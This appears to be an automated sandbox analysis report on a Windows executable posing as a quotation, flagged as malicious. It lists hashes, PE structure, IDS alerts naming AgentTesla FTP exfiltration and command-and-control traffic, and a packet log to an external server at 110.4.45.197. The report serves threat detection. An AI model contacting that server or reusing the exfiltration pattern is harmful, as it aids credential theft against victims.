MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 645120 |
Entropy (8bit): | 7.93913808186164 |
Encrypted: | false |
SSDEEP: | 12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx |
MD5: | 36C4BFF0F1CDCDA62DA9229500CA1E38 |
SHA1: | DE74DBF7BAC85A3A06C7038A4D4241389E6A5C8F |
SHA-256: | FDA83ECB5BD6A07DEDAF6BE0FCE7C626E21E9DF94D82DDB905460E9D6A25A162 |
SHA-512: | 661CDEE4EFE389DAC6AB7D8F5CF92A04403E7B6934942E18B4D2E5A7C609DF58EEA44D2E85EBB9592BF8544BC89C543CC7F01A2E67E0D1041AA22654CCBF124C |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\rQuotation3200025006.exe |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.93913808186164 |
TrID: |
|
File name: | rQuotation3200025006.exe |
File size: | 645'120 bytes |
MD5: | 36c4bff0f1cdcda62da9229500ca1e38 |
SHA1: | de74dbf7bac85a3a06c7038a4d4241389e6a5c8f |
SHA256: | fda83ecb5bd6a07dedaf6be0fce7c626e21e9df94d82ddb905460e9d6a25a162 |
SHA512: | 661cdee4efe389dac6ab7d8f5cf92a04403e7b6934942e18b4d2e5a7c609df58eea44d2e85ebb9592bf8544bc89c543cc7f01a2e67e0d1041aa22654ccbf124c |
SSDEEP: | 12288:rWVw0rZbRJNrpBr6NM+2543sxKNEV28KddaEWtyef:ydbRXpBraM+2W3EKc2gxtx |
TLSH: | 59D423CC77AA8E36EA7C87B60462541813F364C59213FA0D5F8A35CA2E577CCA589F13 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f................................. ........@.. .......................@............@................................ |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x49edee |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66F622F9 [Fri Sep 27 03:14:01 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00402000h] |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ed94 | 0x57 | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x600 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0x9cdf4 | 0x9ce00 | e78b011486a082e9197e2d965fb514b0 | False | 0.9600550921314741 | data | 7.946103748533992 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0xa0000 | 0x600 | 0x600 | 73346f2547818793e4e1f6f605b9d794 | False | 0.4225260416666667 | data | 4.11143285591599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xa2000 | 0xc | 0x200 | b70c11876092b370c3eeffc8aa726bbc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_VERSION | 0xa0090 | 0x32c | data | 0.42980295566502463 | ||
RT_MANIFEST | 0xa03cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5489795918367347 |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T13:10:17.718048+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49741 | 110.4.45.197 | 21 | TCP |
2024-09-27T13:10:19.571041+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49746 | 110.4.45.197 | 53334 | TCP |
2024-09-27T13:10:19.576306+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49746 | 110.4.45.197 | 53334 | TCP |
2024-09-27T13:10:24.710806+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49751 | 110.4.45.197 | 21 | TCP |
2024-09-27T13:10:25.537921+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49753 | 110.4.45.197 | 51497 | TCP |
2024-09-27T13:10:25.543689+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49753 | 110.4.45.197 | 51497 | TCP |
2024-09-27T13:10:31.146663+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49756 | 110.4.45.197 | 21 | TCP |
2024-09-27T13:10:31.976691+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49757 | 110.4.45.197 | 55730 | TCP |
2024-09-27T13:10:31.982121+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49757 | 110.4.45.197 | 55730 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 27, 2024 13:10:02.316216946 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:02.316262960 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:02.316363096 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:02.366570950 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:02.366595030 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:02.928730011 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:02.928808928 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:02.932893038 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:02.932904959 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:02.934041977 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:02.997900963 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:03.790529013 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:03.831480980 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:03.900651932 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:03.900799036 CEST | 443 | 49733 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:03.900868893 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:04.157330036 CEST | 49733 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:07.076766014 CEST | 49736 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:07.081787109 CEST | 21 | 49736 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:07.081937075 CEST | 49736 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:07.134562016 CEST | 49736 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:07.139583111 CEST | 21 | 49736 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:07.139667988 CEST | 49736 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:07.426703930 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:07.432915926 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:07.433006048 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:08.907953024 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:08.908003092 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:08.908032894 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:08.908128977 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:08.908215046 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:08.908216000 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:08.913192034 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.235133886 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.235284090 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:09.240219116 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.609087944 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.609256983 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:09.614214897 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.939069033 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:09.942521095 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:09.947500944 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.269857883 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.270051003 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:10.275121927 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.596981049 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.599124908 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:10.604007959 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.925662041 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.927442074 CEST | 49738 | 53694 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:10.932336092 CEST | 53694 | 49738 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:10.933264017 CEST | 49738 | 53694 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:10.933353901 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:10.938177109 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.762018919 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.818424940 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:11.823148966 CEST | 49738 | 53694 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:11.823651075 CEST | 49738 | 53694 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:11.828017950 CEST | 53694 | 49738 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.828027010 CEST | 53694 | 49738 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.828037024 CEST | 53694 | 49738 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.828672886 CEST | 53694 | 49738 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:11.828742027 CEST | 49738 | 53694 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:12.151508093 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:12.152465105 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:12.157346964 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:12.479223013 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:12.479662895 CEST | 49739 | 53786 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:12.484497070 CEST | 53786 | 49739 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:12.484592915 CEST | 49739 | 53786 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:12.484707117 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:12.489475965 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:12.653898954 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:12.653965950 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:12.654089928 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:12.658118010 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:12.658150911 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.122411013 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.122508049 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.124608040 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.124618053 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.124998093 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.177814007 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.247605085 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.295420885 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.321419954 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:13.321685076 CEST | 49739 | 53786 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:13.326834917 CEST | 53786 | 49739 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:13.326910019 CEST | 49739 | 53786 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:13.353102922 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.353228092 CEST | 443 | 49740 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:13.353522062 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.355443954 CEST | 49740 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:13.365302086 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:13.884481907 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:13.885103941 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:13.885153055 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:14.658535957 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:14.757188082 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:14.757277966 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:15.600683928 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:15.600987911 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:15.605936050 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:15.931091070 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:15.935343027 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:15.940515041 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:16.301481962 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:16.301673889 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:16.306566954 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:16.631720066 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:16.631902933 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:16.636815071 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:16.961774111 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.005969048 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.045949936 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.050843000 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.376188993 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.382038116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.386898994 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.711987972 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.712822914 CEST | 49746 | 53334 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.717789888 CEST | 53334 | 49746 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:17.717855930 CEST | 49746 | 53334 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.718048096 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:17.722975016 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:18.820713043 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:18.820749998 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:18.820830107 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:18.823816061 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:18.823827982 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:19.570696115 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.570862055 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.570960045 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.571041107 CEST | 49746 | 53334 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.571049929 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.571101904 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.571192980 CEST | 49746 | 53334 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.571302891 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.574316025 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.575839043 CEST | 53334 | 49746 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.576230049 CEST | 53334 | 49746 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.576306105 CEST | 49746 | 53334 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:19.901110888 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:19.943479061 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:20.025316954 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:20.025427103 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:20.031899929 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:20.031909943 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:20.032247066 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:20.084069967 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:20.195568085 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:20.202588081 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:20.207396984 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:20.243400097 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:21.281092882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.281181097 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:21.281246901 CEST | 443 | 49748 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:21.281387091 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:21.283852100 CEST | 49748 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:21.284106016 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.284137011 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.284158945 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.284311056 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.336075068 CEST | 49750 | 59960 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.340892076 CEST | 59960 | 49750 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.340964079 CEST | 49750 | 59960 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.341022015 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.345844984 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.858325005 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:21.863250017 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:21.863333941 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.180212975 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.180468082 CEST | 49750 | 59960 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.180468082 CEST | 49750 | 59960 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.185501099 CEST | 59960 | 49750 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.185558081 CEST | 59960 | 49750 | 110.4.45.197 | 192.168.2.4 |
